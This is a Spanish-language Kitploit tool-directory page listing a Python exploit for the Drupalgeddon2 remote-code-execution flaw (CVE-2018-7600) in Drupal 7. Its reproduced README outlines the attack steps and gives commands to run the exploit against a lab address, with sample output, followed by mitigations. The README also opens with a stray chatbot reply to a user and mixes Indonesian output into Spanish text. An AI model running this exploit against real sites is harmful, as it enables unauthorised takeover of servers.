Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2018-7600 — Programa en Python para realizar RCE en Drupal versión 7.56 | Kitploit
Herramientas/GitHubGitHub/xxxtectationxxx/cve-2018-7600
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubxxxtectationxxx/cve-2018-7600

CVE-2018-7600

Programa en Python para realizar RCE en Drupal versión 7.56

Ver Repositorio
hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Listo, Dewa, también agregué la sección de uso desde git clone, así que el README está completo. Esta es la versión final que solo tienes que copiar y pegar en README.md en tu repo de GitHub.

CVE-2018-7600 - Exploit RCE de Drupalgeddon2

Este exploit aprovecha la vulnerabilidad Drupal 7.56 (y algunas versiones anteriores) conocida como Drupalgeddon2.
Esta vulnerabilidad permite Remote Code Execution (RCE) sin autenticación aprovechando una falla en un formulario vulnerable.

🔗 Repositorio: https://github.com/xxxTectationxxx/CVE-2018-7600


⚠️ Advertencia

Este script se creó solo con fines educativos y para pruebas en entornos de laboratorio.
Está prohibido usarlo en sistemas que no tengan permiso oficial para ser probados.


🎯 Versiones Objetivo

  • Drupal 7.x (incluida la 7.56) que no hayan sido parcheadas.
  • También podría funcionar en algunas versiones tempranas de Drupal 8.

📜 Resumen del Funcionamiento

  1. Envía un payload al endpoint user/password con un parámetro que desencadena la función passthru() en PHP.
  2. Extrae el form_build_id de la respuesta del servidor.
  3. Envía una segunda solicitud para ejecutar el comando solicitado.

📦 Instalación y Uso

Clona el repositorio:

root@kitploit:~
git clone https://github.com/xxxTectationxxx/CVE-2018-7600.git
cd CVE-2018-7600

Instala las dependencias:

root@kitploit:~
pip install requests

Ejecuta el exploit:

root@kitploit:~
python3 drupalgeddon2.py --URL <target_url> --COMMAND "<command>"

Ejemplo:

root@kitploit:~
python3 drupalgeddon2.py --URL http://192.168.60.129 --COMMAND "whoami"

💻 Ejemplo de Salida

root@kitploit:~
[*] Mengirim payload awal ke target...
[+] form_build_id ditemukan: form-ABC123XYZ
[+] Output command:
www-data

🛡️ Mitigación

  • Actualiza Drupal a la versión más reciente.
  • Aplica los parches de seguridad oficiales de Drupal.
  • Limita el acceso al servidor durante el proceso de corrección.

📚 Referencias

  • Drupal Security Advisory SA-CORE-2018-002
  • Entrada de Exploit-DB #44449

Descargo de responsabilidad: El autor no se hace responsable por el mal uso de este script. Úsalo con prudencia y únicamente en sistemas legítimos para probar.

Descargar herramienta